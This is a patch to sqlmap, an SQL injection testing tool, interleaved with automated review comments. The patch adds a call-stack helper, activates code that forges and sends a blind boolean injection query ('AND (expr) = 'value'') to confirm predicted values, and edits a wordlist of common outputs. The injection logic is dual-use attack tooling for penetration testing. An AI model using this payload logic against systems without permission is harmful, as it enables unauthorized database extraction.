From 7f0db26e99811ea86fe51db71b7f9c97e7749eec Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 26 May 2010 09:48:20 +0000
Subject: [PATCH] more code updates regarding good samaritan (common output) feature
---
 lib/core/common.py | 18 ++++++++++++++++--
 lib/techniques/blind/inference.py | 17 ++++++++++-------
 txt/common-outputs.txt | 2 +-
 3 files changed, 27 insertions(+), 10 deletions(-)
diff --git a/lib/core/common.py b/lib/core/common.py
index 1c44c4fd1..cb70edb95 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -24,6 +24,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
 import codecs
 import cProfile
+import inspect
 import os
 import random
 import re
@@ -1270,10 +1271,23 @@ def getGoodSamaritanParameters(part, prevValue, originalCharset):
 else:
 return None, None, originalCharset
-def getCompiledRegex(regex):
+def getCompiledRegex(regex, args=()):
 if regex in __compiledRegularExpressions:
 return __compiledRegularExpressions[regex]
 else:
- retVal = re.compile(regex)
+ retVal = re.compile(regex, *args)
 __compiledRegularExpressions[regex] = retVal
 return retVal
+
+#dumper.dbTableValues(conf.dbmsHandler.dumpTable()) -> dumpTable
+def getPartRun():
+ commonPartsDict = { "dumpTable":"Tables", "getColumns":"Columns", "getUsers":"Users", "getBanner":"Banners" }
+ retVal = None
+ stack = [item[4][0] if isinstance(item[4], list) else '' for item in inspect.stack()]
+ reobj = getCompiledRegex('conf\.dbmsHandler\.([^(]+)\(\)')
+ for i in xrange(len(stack) - 1, 0, -1):
+ match = reobj.search(stack[i])
+ if match:
+ retVal = match.groups()[0]
+ break
+ return commonPartsDict[retVal] if retVal in commonPartsDict else retVal
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 1772aa5e5..5fed7b363 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
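Review bot: `getCompiledRegex` keys its cache on `regex` alone, so the new `args` parameter is ignored on every cache hit: once a pattern has been compiled with one set of flags, a later call with different flags silently gets the first compiled object back. Keying on the pair fixes it, e.g. `key = (regex, args)`, `if key in __compiledRegularExpressions: return __compiledRegularExpressions[key]` and `__compiledRegularExpressions[key] = retVal`. In `getPartRun`, `inspect.stack()` loads source context for every frame on the stack each time it runs, and the only caller this commit adds invokes it once per `bisection()` call, so consider caching the result or passing the part name in explicitly. The pattern literal `'conf\.dbmsHandler\.([^(]+)\(\)'` should be a raw string, and note it only recognises calls made with an empty argument list, which is worth a comment such as `# only matches conf.dbmsHandler.<name>() with no arguments`.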
@@ -31,6 +31,7 @@ from lib.core.common import dataToSessionFile
 from lib.core.common import dataToStdout
 from lib.core.common import getCharset
 from lib.core.common import getGoodSamaritanParameters
+from lib.core.common import getPartRun
 from lib.core.common import replaceNewlineTabs
 from lib.core.common import safeStringFormat
 from lib.core.convert import urlencode
@@ -56,6 +57,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 asciiTbl = getCharset(charsetType)
+ kb.partRun = getPartRun() if conf.useCommonPrediction else None
+
 if "LENGTH(" in expression or "LEN(" in expression:
 firstChar = 0
 elif conf.firstChar is not None and ( isinstance(conf.firstChar, int) or ( isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit() ) ):
@@ -376,13 +379,13 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 if singleValue is None:
 val = getChar(index, predictedCharset, False) if predictedCharset else None
 else:
- #forgedPayload = safeStringFormat('AND (%s) = \'%s\'', (expressionUnescaped, singleValue))
- #result = Request.queryPage(urlencode(forgedPayload))
- #if result:
- # finalValue = singleValue
- # break
- pass
-
+ query = agent.prefixQuery(" %s" % safeStringFormat('AND (%s) = \'%s\'', (expressionUnescaped, singleValue)))
+ query = agent.postfixQuery(query)
+ payload = agent.payload(newValue=query)
+ result = Request.queryPage(urlencode(payload))
+ if result:
+ finalValue = singleValue
+ break
 if not val:
 val = getChar(index, otherCharset)
 else:
diff --git a/txt/common-outputs.txt b/txt/common-outputs.txt
index fc6533328..f45aeb776 100644
--- a/txt/common-outputs.txt
+++ b/txt/common-outputs.txt
@@ -2,4 +2,4 @@ users
 [Users]
-luther
\ No newline at end of file
+'root'@'127.0.0.1'
\ No newline at end of file
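Review bot: `kb.partRun` is recomputed at the top of every `bisection()` call, and `getPartRun()` walks the whole call stack with `inspect.stack()`, which loads source context for each frame, so with `conf.useCommonPrediction` enabled that cost is paid once per inferred value although the enclosing part (dump, users, ...) presumably does not change while one value is being bisected. Either set it once where the part starts and clear it when the part finishes, or keep the assignment here but reuse the cached value when it is already set; if the per-call walk is deliberate, a comment such as `# stack walk is cheap relative to the HTTP round-trips that follow` would record that. `bisection()` starts before this hunk.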
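Review bot: The new `else:` branch rebinds `payload`, which is the first parameter of `bisection()` (visible in the hunk header), so after the first common-value check every later use of `payload` in this function, including any the `getChar()` calls below rely on if they read it, sees the forged equality query rather than the original payload; use a local name, e.g. `forgedPayload = agent.payload(newValue=query)` and `result = Request.queryPage(urlencode(forgedPayload))`. Separately, `singleValue` is spliced into `AND (%s) = '%s'` as-is, while the entry this same commit adds to `txt/common-outputs.txt`, `'root'@'127.0.0.1'`, contains single quotes; unless `safeStringFormat` escapes them (its body is not visible here), the forged query is syntactically broken for exactly the kind of value the feature is meant to confirm, so the value should be quote-escaped before formatting. `bisection()` starts and ends outside this hunk.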